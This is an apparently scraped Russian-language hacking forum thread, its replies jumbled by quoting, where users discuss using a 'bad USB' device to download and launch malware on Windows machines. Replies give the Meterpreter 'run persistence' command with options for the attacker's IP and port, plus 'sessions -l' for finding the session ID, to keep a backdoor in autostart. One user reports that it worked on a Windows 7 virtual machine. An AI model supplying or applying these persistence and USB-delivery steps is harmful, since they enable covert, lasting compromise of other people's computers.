Благодарю)meterpreter > run persistence -U -i ( id сессии) -p (порт атакующей машины к которому подключается полезная нагрузка) -r (ip атакующей машины) Я пробовал на виртуалке (Windows 7) ,всё работало.
Мне кажется будет проще выполнить загрузку вредоноса и его открытие, т.е вставил bad usb загрузило, открыло.Все.Привет, такой вопрос, есть грубо говоря "bad usb" подскажите эксплойты в метасплойте, чтобы на выходе было простой текс для командной строки windows
так я знаю что использовать, надо именно как хочу))Мне кажется будет проще выполнить загрузку вредоноса и его открытие, т.е вставил bad usb загрузило, открыло.Все.
Ну ведь всё в твоих руках.Поиск по форуму для чего создан? Сколько статей написано по Metasploit,Mimikatz!Как в метасплоите закрепиться в системе(свой вредонос в автозагрузку занести)?
Может модуль есть какой-нибудь?
А как узнать id сессииКак в метасплоите закрепиться в системе(свой вредонос в автозагрузку занести)?
Может модуль есть какой-нибудь?
Meterpreter > sessions -lА как узнать id сессии
Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab